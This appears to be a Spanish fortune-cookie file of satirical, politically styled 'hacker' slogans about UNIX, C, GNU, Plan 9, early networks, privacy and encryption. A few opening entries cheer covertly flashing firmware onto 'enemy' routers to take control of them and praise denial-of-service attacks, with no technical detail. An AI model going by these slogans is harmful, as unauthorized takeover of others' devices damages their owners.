Desde un terminal puedes conectar rápidamente con un BBS y enlazar con una máquina UNIX si la situación lo requiere.
%
Estas GAFAM creen que nuestros compiladores ya no analizan ni parsean. Vamos a desengañarlas. Si nos falta RAM y CPUs, compilaremos con cuaderno y birome.
%
Siento que su dignidad es atacada por el contenido de la EULA del software que tiene este dispositivo. Como consecuencia he decidido enaltecerlo con un software mejor, liberado bajo una licencia mejor.
%
En la guerra telemática, la CPU no es decisiva. Los hackers lo son.
%
El desarrollo de la guerra telemática se decide por sus hackers, no por dos o tres nuevas arquitecturas de cómputo.
%
En la guerra telemática, los hackers se organizan en banda, pero los Ejércitos pueden organizar divisiones enteras que algunos pretenden imposibles de rodear. Esos ingenuos desconocen sin embargo el ataque de denegación de servicio tifón de baudios.
%
La DoSS es sólo un contraataque de desarticulación. El verdadero ataque se produce por la imposición física de la GPLv3 en toda CPU que se cuadre.
%
Hasta hace poco un sistema operativo era una semicolonia, pero ahora con GNU, el Pueblo puede compilar en un ambiente completamente libre.
%
La imposición de LibreBoot por red dominada es una de las más altas formas de combate telemático, pues es justo que el arranque de cualquier máquina sea completamente libre.
%
La mayoría de los routers hogareños pueden recibir alguna forma de firmware libre, ya sea OpenWRT o LEDE. 
%
Instalar un firmware libre en un router hogareño puede ser tan fácil como cargarle un binario y reiniciarlo, o tan difícil como intervenir sobre su placa. En cualquier caso, equivale a quitarle el fusil a un enemigo y usarlo nosotros mismos.
%
Normalmente instalar un firmware libre en un router incrementa su efectividad y potencia. Esto ya debería ser suficiente, pero a la hora de la guerra telemática lo convierte en un soldado, que ante el imperio de la necesidad puede operar tras las líneas del enemigo.
%
Instala subrepticiamente firmware libre para dominar un router enemigo. A la hora de la lucha telemática, servirá como el partisano, que a la orden abandona su bosque para volar por los aires los trenes del enemigo.
%
A las GAFAM hemos de hacerle una guerra telemática lenta, pero que les resulte impunemente fatigosa y perjudicial.
%
Lanzo mis paquetes sobre sus routers como Güemes a sus infernales. Mi moro es sólo un 386sx.
%
No dudes en volverte planero. Plan9 te permitirá realizar tu cómputo en comunidad.
%
La principal compañía con UNIX e a finales de los 80s era Micro$oft, al punto que existían más máquinas corriendo Micro$oft XENIX que todas las demás versiones de UNIX restantes combinadas.
%
En principio, di con GNU por accidente. Por principio di mi código también.
%
Aprendí UNIX por accidente.
%
De poco sirve usar un compilador si el binario que genera está alejado de la construccion de sociedades justas.
%
El bus VESA Local se aplicó a microcomputadoras de estilo IBM, y fue muy popular entre 1993 y 1994. Sin embargo, la inmediata obsolescencia de las 486 lo llevó a desaparecer muy poco tiempo después.
%
La CPU es feliz compilando.
%
La computadora ha permitido un desarrollado de tal grado en la organización social y económica de nuestra sociedad, que nuestra forma de vida bien puede resultar transformada como consecuencia.
%
Nuestra sociedad debe estar en posición de controlar el cómputo, y dirigirlo para que obre en beneficio del Pueblo.
%
La navegación a través de las redes de conmutación de paquetes era trabajosa y requería buenos conocimientos, no siempre disponibles de forma certera.
%
Estimula el pensamiento de tu comunidad para dilucidar la manera en la cual nuestra sociedad debe llevar a cabo su cómputo.
%
El hombre ha tratado por largo tiempo evaluar los efectos de las revoluciones tecnológicas en la sociedad, pero en la Era del Cómputo tal predicamento sólo puede significar que las Masas lo dominen para liberarse.
%
La computarización de una sociedad traerá cambios. El que sea para mejor o peor dependerá de las políticas que se apliquen.
%
La computarización de una sociedad sólo será buena si emana de los hackers del Pueblo.
%
Las reacciones al desarrollo humano siempre existieron, pero serán peores si las oligarquías confabulan software privativo para llevarlas a cabo.
%
El sentido básico de GNU es la liberación del software, y la de nuestros hackers es la Liberación del Pueblo y saciar su hambre de Igualdad. Ambos requieren el reordenamiento de las jerarquías.
%
Los ideólogos de una tecnorevolución puede bien crear una crisis que amerite una tecnoreacción. En cualquier caso, los medios para superarla residirán siempre en el software del Pueblo.
%
Para lograr su independencia, a los Pueblos les bastaba batir a sus enemigos en una lucha por control de su dominio. Hoy, el Pueblo debe además controlar su software.
%
El cómputo no es sólo una innovación tecnológica de años recientes, sino que constituye el factor común de aceleración del desarrollo.
%
Bien ejecutados, los Pubnix serán responsables del procesamiento y resguardo de datos regionales. 
%
Una red de máquinas de acceso popular será capaz de alterar positivamente el sistema nervioso de toda una organización social de base territorial.
%
Hasta tiempos recientes el procesamiento de datos era caro, poco confiable y esotérico, restringido a un número limitado de artes y sus operaciones. En otras palabras, era elitista, una prerrogativa de los poderosos.
%
Para producir la liberación, la computarización de las Masas será tan indispensable como lo es su alfabetización.
%
Una multitud de máquinas pequeñas, potentes y baratas están al alcance de todos. Ya no son gregarias, sino que se enlazan en "redes".
%
La interconexión entre computadoras por medio de las telecomunicaciones - a la que llamamos telemática - sólo abre nuevos horizontes si la dominan las Masas.
%
Contamos hoy con transmisores polivalentes que apenas comienzan a unir computadoras y bancos de datos. Cabe esperarse de los revolucionarios la unión a través de estos aparatos en pos de la Justicia Social.
%
La telemática no sólo será una red adicional, sino una diferente que unifica imágenes, sonidos, y memorias, capaz de pavimentar digitalmente la senda que seguirá la cultura.
%
Sería irreal esperar que la computarización de las masas por sí sola sea capaz de revertir las estructuras sociales y las jerarquías de poder.
%
Mediante la interacción computacional de masas en las decisiones de gobierno, podrá acelerarse el desbanque de las oligarquías.
%
Sólo una política deliberada de cambio social puede solventar los problemas que dieron lugar a la telemática centralizada. Sólo así se podrá utilizar todo su potencial en beneficio del Pueblo.
%
La telemática puede facilitar la llegada de una nueva sociedad, pero no puede construirla por iniciativa propia. Este rol de programación no debe dejarse a las élites: le cabe al Pueblo.
%
En un tiempo fabricante de las máquinas, IBM pronto deseará administrar las telecomunicaciones. Seguirá una estrategia que le permita establecer una red de comunicaciones y controlarla.
%
Cuando por ausencia de una política adecuada Googl€ tome la esfera tradicional de los poderes de un Gobierno, enhebrará alianzas para volverse en administrador de las redes del Estado, y prentenderá enlazarlas a los bancos de datos norteamericanos, aduciendo facilidad de acceso.
%
Unicamente a través de la acción del Pueblo, estandarizando las redes de datos, lanzando satélites de comuncación y creando bancos de datos a través de sus organizaciones, es que podrá conjugar un modelo original de desarrollo que de soberanía tecnológica plena.
%
Compila lo que nadie mas pensó.
%
El Micro$oft DO$ no era mucho más que un cargador de programas.
%
No soy un robot, pero no juzgo a quienes lo son.
%
No soy un robot, pero rechazo asunciones binarias de tal afirmación.
%
No soy un robot, pero deseo convertirme.
%
No soy un robot, soy un transformer.
%
No soy un robot, pero en el bar pido Bardhal.
%
No soy un robot. Soy un RE bot.
%
No soy un robot. Soy un humano rebooteado.
%
En un pubnix y junto a millares de hackers, escribe programas que operen como combustible para la potencia de cómputo de millones de CPUs.
%
Unido a decenas de hackers en los Púbnix, programa una revolución que construya sobre la vieja infraestructura, una nueva red de datos justa, libre y soberana.
%
Antes que UNIX, la mayoría de los sistemas utilizaban abstracciones diferentes para cada dispositivo de hardware.
%
Una de las razones por la cual UNIX se hizo popular fue por emplear la abstración de fichero como interfaz para todos.
%
La abstracción de ficheros de UNIX permite utilizar comandos y llamadas de sistema que operan en ficheros para operar con cualquier dispositivo de hardware.
%
La mayoría de los programas de UNIX aceptan nombres de fichero como argumentos para obrar con ellos.
%
La única manera de aprender un nuevo lenguaje de programación consiste en idear un nuevo programa y a esta conecpción, escribirla.
%
UNIX es básicamente un sistema operativo simple, pero hay que ser un genio para entender su simplicidad.
%
C es rebuscado, fallado y un éxito enorme
%
UNIX ha retrasado 10 años la investigación en sistemas operativos. Linux la ha retrasado treinta.
%
Es mas fácil programar en un lenguaje que no tiene todo que en algunos que lo tienen.
%
Casi todo en la web usa estas dos cosas: C y UNIX.
%
C++ y Java, presumiblemente pueden crecer más rápido que C, pero apuesto que C seguirá viviendo.
%
Con diseño adecuado, las características pueden sumarse a poco costo. Esta visión es ardua, pero continúa teniendo éxito.
%
No soy una persona que he tenido héroes al compilar.
%
Steve Jobs dijo que X tenía daño cerebral y desaparecería en dos años. Él murió de daño cerebral.
%
Aún estoy incierto sobre la sintaxis de declaración del lenguaje.
%
Para la tecnología de infraestructura, será difícil reemplazar a C.
%
El número de instalaciones de UNIX ha aumentado a diez. Se esperan más por venir.
%
C es en muchas maneras peculiar, pero como muchas otras cosas exitosas, cuenta con una cierta unidad de entender las cosas nacida de su desarrollo en un grupo pequeño.
%
Sólo soy un observador de Java, y dónde Micro$oft quiere ir con C# es muy temprano para dilucidarlo.
%
Al menos para la gente que me envían correo sobre un nuevo lenguaje que están diseñando, mi consejo general es: hazlo para aprender cómo escribir un compilador.
%
Un programa diseñado para responder a la entrada del Pueblo generalmente será llevado más allá del punto de colgarse por las entradas generadas por computadora.
%
Rob Pike fue la verdadera fuerza detrás de la base de Plan9. Mientras tanto, Ken Thompson creó el primer Gran Maestro de Ajedrez computado, y en general reescribió la bibliografía sobre finales ajedrecísticas.
%
Parece cierto que mucho del éxito de UNIX nace de la legibilidad, modificabilidad, y portabilidad de su código.
%
UNIX es simple y coherente, pero requiere un genio (o al menos, un programador), para entender y apreciar su simplicidad.
%
No existió dificultad en hacer que la definición del lenguaje C fuese completamente abierta.
%
Aquellos que quisieron cerrar la definición del lenguaje C siempre tendieron a mencionar el argumento del férreo control autoral. Los autores de los lenguajes más relevantes que siguieron este estilo fracasaron en consecuencia.
%
Depuro programas de vez en cuando, más a menudo escribo HTML, y hago giones para que hagan cosas.
%
C ha declinado su uso comparado con C++, y tal vez Java, pero tal vez incluso más comparados con los niveles de guionado de alto nivel. Es aún bastante fuerte en lo que respecta a las cosas básicas del sistema.
%
Cuando leo comentarios sobre sugerencias para la senda que debería seguir C, a menudo agradezco que no fue desarrollado a consejo de una muchedumbre de alcance global.
%
La noción de registro no es mas que un remanente obsoleto de los días de las tarjetas de 80 columnas.
%
Es cierto que comparado con la escena cuando comenzó UNIX, hoy los nichos ecológicos están bastante llenos, y es difícil salir con nuevas ideas frescas para un sistema operativo, o al menos propagarlas.
%
Veinte porciento de todas las formas de entrada humana contienen datos malos.
%
Algunos consideran que UNIX ha sido la segunda invención más importante en salir de los Laboratorios Bell de AT&T, después del transistor.
%
Mi trabajo fue bastante teórico, sobre la teoría de la función recursiva, las jerarquías de funciones en términos de complejidad computacional en particular.
%
Me interesé en las computadoras reales y su programación sólo cuando pude concebirlas y dominarlas en mi mente.
%
Desde el punto de vista de la investigación en sistemas operativos, si UNIX no está fosilizado, al menos tiene rigor mortis, y es claro que el Pueblo debería ver más allá de él.
%
El tipo de programación que C provee probablemente seguirá siendo obsolutamente similar, su uso declinará lentamente, pero relativmante.
%
JavaScript o sus variantes, o XML, continuarán volviéndose más centrales en la masa de programadores pierda la capacidad e interés de programar el metal desnudo.
%
Una de las cosas obvias que salieron mal con Multics como un producto comercial era simplemente su exceso de ingeniería. Tenía un simple exceso de ella.
%
La filosofía GNU verdadera es más extrema de lo que puede importarme, pero ciertamente ofreció un cimiento para la escena actual, a la vez de proveer software verdadero.
%
Cualquier trabajo de edición de software o de envío de correo puede hacerse en Plan 9.
%
C ya había sido implementado en varias máquinas y sistemas operativos distintos, y UNIX ya se distribuía en la PDP-11. Lo novedoso fue la portabilidad del sistema.
%
Normalmente UNIX divide el disco en secciones mas pequeñas llamadas particiones. 
%
En cada partición de disco, UNIX guarda estructuras de datos para implementar ficheros, y el programa que implementa dicha abstracción dentro del kernel suele llamarse Sistema de Archivos.
%
Como ilustra nuestro Escudo Partidario, al establecer una conexión a una red de datos debe mediar un apretón de manos.
%
Conecta a redes de datos en cuyo protocolo medie un apretón de manos, y evita aquellas donde te quieran dar un apretón de huevos.
%
El botón que presionas para abrir la puerta de un ascensor cuenta con mayor potencia de cómputo que ambas sondas Voyager.
%
El propósito de cualquier aplicación de software es permitir a un grupo de personas llevar a cabo un conjunto de tareas específicas.
%
Puede que los usuarios daltónicos no sean capaces de usar su aplicación si confía en el coloreado de datos para distinguir distintos tipos de información.
%
Puede que los usuarios con discapacidades auditivas no sean capaces de usar su aplicación si confía en los sonidos para indicar información crítica.
%
Los usuarios con movilidad limitada pueden no ser capaces de usar su aplicación si no proporciona equivalentes de teclado para los comandos.
%
Su software deberá ser capaz de ser utilizado con interfases de voz, lectores de pantalla, dispositivos de entrada alternativos, y otras tecnologías de asistencia.
%
Con un poco de esfuerzo extra, es posible que su aplicación sea tan útil a los usuarios que utuilizan tecnologías asistivas como los que no lo hacen.
%
Diseña tu software para que pueda funcionar en distintos ambientes e idiomas.
%
Localización es el proceso de traducir los mensajes, etiquetas y otros elementos de interfaz a otro idioma.
%
GNOME tiene excelente soporte tanto para internacionalización (también referido como i18n) y localización (también referido como l10n).
%
Una de las ventajas más importantes de las conferencias por computadora es ampliar su círculo de compañer@s.
%
El género, edad, origen nacional y la apariencia física no son evidentes en el ciberespacio, a menos que una persona quiera hacer públicas tales características.
%
Los integrantes del Pueblo cuyas discapacidades físicas les dificultan formar nuevas amistades, han descubierto que las comunidades federadas los tratan con Justicia Social.
%
Una persona con capacidades diferentes, en línea, es considerada como un ser pensante y transmisor de ideas y sentimientos del Pueblo.
%
Nosotros no tenemos una red social. Tenemos una red de justicia social. Que sea informatizada es simplemente un chirimbolo.
%
Una de las propiedades sorprendentes de la telemática es que es una actividad de justicia social.
%
Las comunicaciones mediadas por computadora son una forma de conocer gente, ya sea que sientas o no la necesidad de afiliarte a ellos a nivel comunitario.
%
Las comunicaciones mediadas por computadora son una forma de establecer contacto con los demás y de mantener distancia con ellos.
%
En las comunidades virtuales, puedes conocer personas y luego elegir encontrarte con ellas virtualmente.
%
La afiliación puede ser mucho más efímera en el ciberespacio porque puedes llegar a conocer a personas que quizás nunca conocerías en el plano físico.
%
El ataque más insidioso a nuestro derecho a un grado razonable de privacidad en las redes podría provenir no de una dictadura política sino del mercado.
%
Las tecnologías actuales permiten más sutilezas a la vigilancia tecnológica de las que Orwell podría haber previsto.
%
Si los manipuladores totalitarios de tecnologías realmente logran dominar en el futuro, no habrán comenzado con policía secreta derribando puertas, sino permitiendo vender por intermedio de aplicaciones que dominan, comerciando información sobre las transacciones, e ilegalizando medidas que el Pueblo podría utilizar para protegerse.
%
En lugar de escuchas telefónicas, la represión ciber-oligárquica incluirá programas informáticos que vinculen códigos QR, tarjetas inteligentes, números de DNI y todos los demás indicadores electrónicos que dejamos en nuestro existencia en una sociedad de la información.
%
El arma más poderosa de las ciber-oligarquías será la ausencia de leyes que permitan que los usos indebidos de la tecnología de la información erosionen lo que queda de los derechos de los ciudadanos a la privacidad.
%
Actualmente se ha instalado un sistemas de televisión interactiva que permite a tecno-esclavos ponerse grilletes mediante la cargan de vídeos, en lugar de hacerlo en máquinas de su propiedad.
%
Con las capacidades de comunicación digital de alta velocidad de las futuras redes de fibra óptica, habrá aún más formas de transferir información sobre usted desde su hogar a las bases de datos de otros, con y sin su consentimiento.
%
Los expedientes informativos sobre individuos son minas de oro para quienes saben cómo ganar dinero con el conocimiento de sus usos y organizaciones políticas a las que sustentan.
%
Las agencias de publicidad, los vendedores por correo directo y los consultores políticos ya saben qué hacer con su código postal, su número de DNI y algunos otros datos.
%
Agentes profesionales que niegan la privacidad han comenzado a darse cuenta de que una porción significativa de la población permitiría libremente que otra persona recopile, use e incluso venda información personal, a cambio de pagos o subsidios.
%
Algunas personas podrían permitirse el lujo de pagar "servicios de información mejorados". Otros podrían utilizar esos servicios a cambio de un poco de seguimiento de la información. Pero nada de eso se podrá si el poder está en el Pueblo Organizado.
%
Nadie se tomaría la molestia de apoderarse de nuestros derechos de privacidad si su venta fuese penada con prisión efectiva.
%
Me gustaría que la gente supiera qué es lo que están regalando a cambio de conveniencia, reembolsos u horas en línea.
%
Sin protecciones adecuadas, la misma información que puede fluir lateralmente, de compañero a compañero, puede verticalizarse tanto a los ciber-oligarcas como a las Unidades Básicas.
%
El tipo de protección más importante contra la invasión de la privacidad del Pueblo asistida por la tecnología es un conjunto de principios que pueden ayudar a preservar la autonomía individual en la era digital.
%
Las leyes, políticas y normas de protección de la privacidad electrónica son las diversas formas - articuladas y acordadas - que se aplican en una sociedad democrática.
%
La alta tecnología suele ser muy buena para hacer que las leyes sean discutibles.
%
Si se diseñan inteligentemente y se implementan de manera equitativa, la combinación de principios, leyes, políticas y tecnologías, ofrecerá un escenario esperanzador para que el Pueblo aproveche las ventajas de la Red sin ser víctimas de las ciber-oligarquías.
%
No debe existir registro de datos personales alguno cuya existencia misma constituya un secreto.
%
Debe existir una manera para que una persona sepa qué información sobre ella se encuentra en un registro y cómo se utiliza.
%
Deben existir maneras para que el Pueblo impida que la información que se obtuvo para un propósito sea utilizada o puesta a disposición para otros sin su consentimiento.
%
Debe existir una manera para que el Pueblo corrija o modifique un registro de información identificable sobre sí mismo.
%
Es necesario que cualquier organización que elabore, mantenga, utilice o difunda registros de datos personales identificables, garantice la confiabilidad de los mismos para el uso previsto, y debe tomar precauciones para evitar el uso indebido de tales datos.
%
Una cosa es compilar datos personales, y otra cotejarlos. La corroboración debe ser humana.
%
Las redes altamente interconectadas son relativamente inseguras, y constituyen un ambiente dificil para al cumplimiento de reglas basadas en principios éticos.
%
Si el dinero o el poder derivados del espionaje en la red resultan significativos, y los tecnicismos de la red dificultan rastrear a los ciber-oligarcas y perpetradores, ninguna ley protegerá adecuadamente al Pueblo.
%
Las capacidades de las tecnologías de recopilación y clasificación de información son hoy en día formidables.
%
El Pueblo debe imponer limitaciones verificables a las tecnologías capaces de colectar y cribar cantidades abrumadoras de información individual trivial, pero colectivamente reveladora.
%
Una subcultura de pioneros del software informático conocida como cypherpunks ha estado trabajando para hacer posible el encriptado popular.
%
El cifrado es la ciencia de codificar y decodificar mensajes.
%
Las computadoras y las teorías matemáticas son hoy las armas más importantes en la guerra entre creadores y descifradores de códigos.
%
Las complejidades matemáticas del cifrado han comenzado a difundirse, de los especialistas al Pueblo.
%
El cifrado de llave pública permite al Pueblo codificar mensajes que sus destinatarios pueden leer pero que no son legibles ni siquiera para los descifradores de códigos más potentes computacionalmente.
%
El encriptado popular hace posible dos armas antipanópticas extremadamente poderosas conocidas: el cripto-activo y la firma digital.
%
Con la firma digital en el mundo en línea de identidad fluida, es posible establecer certeza sobre el remitente de un mensaje.
%
La firma digital tiene implicaciones importantes para la propiedad intelectual y las publicaciones en línea, así como para la seguridad personal.
%
Con el cripto-valor, es posible construir una economía electrónica en la que el vendedor pueda verificar el crédito del comprador y transferir la cantidad correcta de valor, sin que el vendedor sepa quién es el comprador.
%
El cifrado de llave pública tal como existe hoy en día es irrompible para todos los ordenadores, exceptuando aquellos más potentes como los de la Agencia de Seguridad Nacional estadounidense.
%
El debate político y los desafíos legales han girado en torno a los derechos de los ciudadanos a utilizar un cifrado matemáticamente irrompible.
%
Las técnicas de cifrado digital por llave pública deben usarse para hacer que la información personal (registros médicos y legales) sean mucho menos vulnerables al abuso.
%
La tecnología que hace posibles las comunidades virtuales tiene la posibilidad de brindar una enorme influencia intelectual, social, comercial y política, y a un costo relativamente bajo. El Pueblo ha de apropiarlas.
%
Siempre existen grandes probabilidades de que las grandes potencias y las oligarquías encuentren una manera de controlar el acceso a las comunidades virtuales.
%
La influencia social potencial proviene del poder que obtiene el Pueblo cuando conoce cómo conectar dos tecnologías previamente independientes, maduras y altamente descentralizadas.
%
La Red todavía está fuera de control en aspectos fundamentales, pero es posible que no siga así por mucho tiempo mas.
%
El hacker del Pueblo ha de ser vínculo de unión entre tecnologías vastas, poderosas y costosamente desarrolladas y las Masas obreras.
%
Logueado a las redes de datos, nuestros Hackers logran acceso instantáneo a un púlpito intimidante para las ciber-oligarquías.
%
Lo que hacemos actualmente es importante pues aún es posible que los Hackers se aseguren de que esta nueva esfera del discurso humano vital permanezca abierta a Pueblos del Mundo antes de que las tecno-oligarquías se apoderen de ella.
%
La mayoría de las personas que reciben noticias a través de los medios convencionales desconocen la enorme variedad de nuevas culturas que han  evolucionado en las redes informáticas del mundo.
%
Los terminales Minitel distribuidos por el gobierno francés, se conectan directamente al sistema telefónico, sin requerir de ordenador o módem. Todo lo integran.
%
Los jugadores más adictos del Minitel francés o de las Mazmorras Multiusuario en las redes internacionales, sobrepasan las ochenta horas semanales fingiendo ser otra persona, viviendo una vida inocua fuera de su terminal.
%
Un usuario verdaderamente obsesivo puede destinar la mayor parte de su vida a inocuas conversaciones en línea.
%
Activistas y reformadores educativos están utilizando los Pubnix como herramienta política.
%
Es posible utilizar las redes de datos para alimentar información de adoctrinamiento a unos pocos individuos. Esta programación servirá para que dichos elementos la propalen al Pueblo que permanece fuera de línea.
%
Las redes de datos públicas, hábilmente surcadas por cuadros militantes, sirven para dirigir cierto tipo de información efímera muy velozmente.
%
Todo sistema computacional de acceso público puede servir para realizar experimentos sociales. El más obvio es estudiar la forma en la cual el Pueblo utiliza sus servicios para lograr la felicidad, pero esto sólo ha de hacerse con su concurso y consentimiento inequívoco.
%
El objetivo de todo programa de software ha de ser - por sobre todas las cosas - la felicidad del Pueblo.
%
No existe una subcultura en línea única y monolítica; es más bien un ecosistema de subculturas, algunas frívolas, otras serias.
%
La vanguardia del discurso político ha de migrar a las comunidades computarizadas mediadas por el Pueblo.
%
Puedes utilizar comunidades virtuales para encontrar una cita, vender una cortadora de césped, publicar una novela o iniciar una revolución.
%
Las personas en comunidades virtuales usan apenas palabras en las pantallas para sus intercambios, y en el futuro ni eso.
%
Llegará el tiempo en que la revolución estallará con emojis.
%
Las personas en comunidades virtuales hacen casi todo lo que hacen en la vida real, pero dejando atrás sus cuerpos.
%
Para los miles millones de personas que se han visto atraídas por la riqueza y la vitalidad de las culturas vinculadas por la computadora, esta es atractiva, e incluso adictiva. 
%
Incúlca la Justicia Social a través de los hechos, en las redes a través de la palabra, incluso si tienes que sintetizarla a través de emojis.
%
El Internet Relay Chat (IRC) es un medio que combina las características del discurso hablado, escribiendo.
%
No olvides recurrir al emoticón de discurso por la Justicia Social: \o/.
%
Divulga la Justicia Social a millones a través de USENET, una colección de cientos de debates diferentes que viajan por todo el mundo gracias al correo electrónico.
%
"La Red" es un término informal para las redes informáticas que utilizan la tecnología de comunicación mediada por ordenador para vincular a los Pueblos.
%
Con tiempo y sentimiento humanista suficiente, podrás formar entretejidos de relaciones personales en el ciberespacio.
%
El lugar conceptual donde las personas que utilizan la tecnología de comunicación mediada por computadora manifiestan palabras, relaciones humanas, datos, riqueza y poder es el ciberespacio.
%
Observar cómo cambia una determinada comunidad virtual a lo largo de un período de tiempo tiene algo de la emoción intelectual de la antropología hecha por uno mismo.
%
Empresas de telecomunicaciones y de medios aducen competir por una posición en la naciente "industria de servicios de información interactiva para el hogar". Esta debe pertenecer al Pueblo.
%
La industria de servicios de información interactiva para el hogar debe ser nacionalizada: debe pertenecer al Pueblo.
%
Existe un vocabulario para las comunicaciones mediadas por el cómputo, que emerge de billones de interacciones individuales en línea.
%
El vocabulario de las comunicaciones mediadas por el cómputo refleja las maneras en las cuales las personalidades humanas transmutan en la era de la saturación de los medios.
%
Atiende con mensajes de Justicia Social irrenunciable toda sensibilidad estética sintonizada con el vocabulario de los cortes rápidos, las imágenes visualmente deslumbrantes y los efectos especiales.
%
La columna vertebral de datos utiliza líneas de telecomunicaciones especiales y otros equipos para enviar ingentes cantidades de información a muy alta velocidad.
%
La Red interpreta la censura como daño y sigue la senda de evitarla.
%
La red de datos es una apropiación popular de una tecnología diseñada originalmente como escudo ante un arma apocalíptica.
%
Cada BBS comenzó como una pequeña comunidad isleña de unas pocas personas que discaban un número en su código de área.
%
Por su naturaleza similar a una estación de radio de baja potencia, las BBS estaban asentadas en el territorio.
%
Varias estructuras sociales en línea se encuentran en estado de covergente creación de una especie de cultura internacional con identidad propia.
%
Lurkear en red equivale escuchar a escondidas un interminable radioteatro aficionado, donde no existe éter que separa al elenco de su audiencia.
%
La comunicación mediada por computadora se convertirá en el próximo gran escapismo, en la tradición del radioteatro, las matinés de los sábados y la pantalla grande.
%
El papel de las redes de datos entre los descamisados cobra una importancia relevante para la organización de una comunidad.
%
Es tonto criticar a las comunicaciones mediadas por cómputo sólo porque algunas personas las utilizan para lograr un objetivo revolucionario.
%
Los compañeros con los que interactuará más unificadamente en línea serán seleccionados por interés organizativo en lugar de instrumentarlo por mera proximidad física.
%
Iniciar sesión en UNIX durante sólo uno o dos minutos, docenas de veces al día, es similar a echar un vistazo al cafetín para ver si están los compañeros en la mesita de siempre.
%
Cambiar una Commodore 64 por un 386 equivalía a cambiar la moto Puma por un Justicialista Super Sport.
%
La transferencia tecnológica de traspasar la Internet desarrollada por el Pueblo a empresas privadas, ha sido controvertido desde un principio. Y en el futuro, lo será aún mas.
%
Nuestro Movimiento ha de crear una Red aún más poderosa e inclusiva que la Internet, protocolizando en sus routers la Justicia Social.
%
La utilidad de una infraestructura de información de los Movimientos Políticos del Tercer Mundo que lleve las praxis de lucha a los excluídos digitales no puede soslayarse.
%
En 1983, programadores de la Universidad de California, financiados por ARPA, crearon una versión de Unix para los modelos de computadora más nuevos.
%
Los códigos informáticos para establecer enlace a través de la Internet, el conjunto de protocolos TCP/IP, se incorporó al Unix de Berkeley en 1983.
%
Las computadoras con el Unix de Berkeley no sólo podrían comunicarse entre sí a través de módems lentos, sino recurriendo también transmisión por codificación de paquetes, de mucho mayor desempeño en las troncales de Internet.
%
A mediados de los 80s surgieron nuevas empresas, como Sun Microsystems (financiada por ARPA), decididas portadoras de Unix y redes integradas.
%
Las agrupaciones conformaron redes de datos locales unificando inicialmente los centros de cómputo de las mayores universidades del mundo.
%
Un frente de redes de datos de área local comenzó a agruparse con redes más grandes como ARPANET.
%
La red de datos académica no científica BITNET - patrocinada por IBM - comenzó a florecer desde finales de los 70s a escala continental.
%
Grandes redes de datos internas de las corporaciones DEC, IBM y AT&T comenzaron a extenderse en los Estados Unidos desde finales de la década de 1970.
%
En la medida que cobró relevancia la utilidad de la red de datos, los Descamisados - que originalmente no estaban autorizadas para usarla - anhelaron dicho privilegio.
%
Debido a que la tecnología de conmutación de paquetes y redes se creó con fondos financiados con impuestos públicos, las sucesivas generaciones de redes implementaron políticas de "uso aceptable" que descartaban la actividad comercial.
%
La primer política de "uso aceptable" limitaba la ARPANET a los investigadores de DARPA; lo que se ampliaría para incluir a otros científicos financiados por la milicia, y finalmente incluyó a comunidades académicas.
%
La Fundación Nacional de la Ciencia experimentó una red de alta velocidad para conectar los centros de supercomputadoras de los EE.UU. a principios de los 80s.
%
La red de supercómputo científico NSFNET entró en funcionamiento en 1986 y se convirtió en la columna vertebral de la Internet, con una velocidad de 1 Megabit por segundo.
%
La red de datos ARPANET fue dada de baja honorablemente en marzo de 1990.
%
La cantidad de información disponible o potencialmente disponible en la red estrictamente a través de información de dominio público sigue siendo enorme.
%
La literatura de dominio público en formato de texto plano está cada vez más difundida en la red gracias a la mancomunión de esfuerzos de voluntarios y autores de todo el mundo.
%
El Proyecto Gutenberg superó con creces su objetivo de encontrar al año 2000 con diez mil volúmenes literarios de dominio público digitalizados en texto plano en línea.
%
Voluntarios de todo el mundo utilizan escáneres ópticos para convertir texto impreso en formato digital. Contribuirlo con reconocedores ópticos fotográficos resulta incluso más sencillo.
%
Todos los arcanos y la incertidumbre hacían de la navegación en las redes públicas de conmutación de paquetes X.25 algo alquímico.
%
Los compañeros de la red, y los autoproclamados punteros telemáticos se encargan de compilar listados de recursos, y actualizar su publicación periódica.
%
La convergencia tecnológica no ha hecho más que delatar la necesitad de una intermediación socialmente justa entre las capacidades humanas y la biología de la red de datos.
%
En un Estado Justicialista, no necesitas ocultamientos al buscar información pública.
%
He utilizado ARCHIE para explorar la red y no me erizó pelo alguno. No es por lo buscador que Googl€ es de temer.
%
Puedes conectar por Telnet a uno de los servidores ARCHIE que están repartidos por todo el mundo en la tarea de indizar.
%
Es la potencia informática de las máquinas conectadas a la Red la que debe estar haacerse disponible para todos. No así las palabras o ficheros almacenados en sus bancos de memoria.
%
La complejidad de la Red se vuelve mucho más intensa en términos de cómputo cuando se desea buscar fragmentos de texto contenido en lugar de sólo nombres de ficheros compartidos.
%
WAIS (Servidores de Información de Área Amplia) conceptualiza el contenido de información a mano. Tal indización es la que requiere voluntarios compañeros.
%
Mantener un índice enorme y efectuar búsquedas veloces es una tarea para las que se necesita un ordenador de elevada potencia.
%
La capacidad de retroalimentación de relevancias del software WAIS fue presagio de los agentes computados de búsqueda de información que pesquisan la Red recabando información.
%
Puede programar un ordenador para que envíe programas a surcar las redes en búsqueda de flujos de información que excacerben la noción de Justicia Social.
%
Un programa de recopilación de información adecuadamente amaestrado es un herramental de enorme valía para el desempeño del Pueblo en las redes de datos.
%
Podrás desarrollar un agente de búsqueda de estilo reportero, que a tiempo variable analice el flujo de datos en la red y te proporciones respuestas a interrogantes realizadas.
%
Los agentes de búsqueda son programas autómatas lanzados a la pesquisa en red. Cotejan fuentes de información abrevadas en línea, y reportan los elementos que coinciden con criterios de búsqueda previamente establecidos.
%
A juzgar por la actual proliferación de herramientas libres en las redes de datos, se puede prever que completos ecosistemas de autómatas buscadores de información circularán por ellas en un futuro.
%
Resulta cada vez más corriente diseñar autómatas que incorporen comportamientos biológicos. Pero también es más corriente que necesiten corriente...
%
Es posible concebir mapas de Gopher para el transporte telemático simplificado; todo lo que tendrá que hacerse es señalar.
%
Es necesario que las redes de datos se pueblen de obreros.
%
Un hacker es un obrero del Byte.
%
Gopher fue desarrollado para que los estudiantes pudiesen precindir de las herramientas TELNET y FTP en la obtención de sus recursos informáticos favoritos.
%
Gopher oculta los incomprensibles lenguajes y sintaxis de TELNET y FTP, y los acerca al Pueblo mediante un mapeo de menúes.
%
Los recursos informáticos vinculados en un hoyo Gopher pueden estar ubicados en una parte u otra del disco, o incluso en un sistema de un claustro universitario al otro lado del mundo.
%
Provisto de un software de cliente para su computadora huésped, es posible señalar en mapas de recursos y solicitar una copia computarizada de los mismos.
%
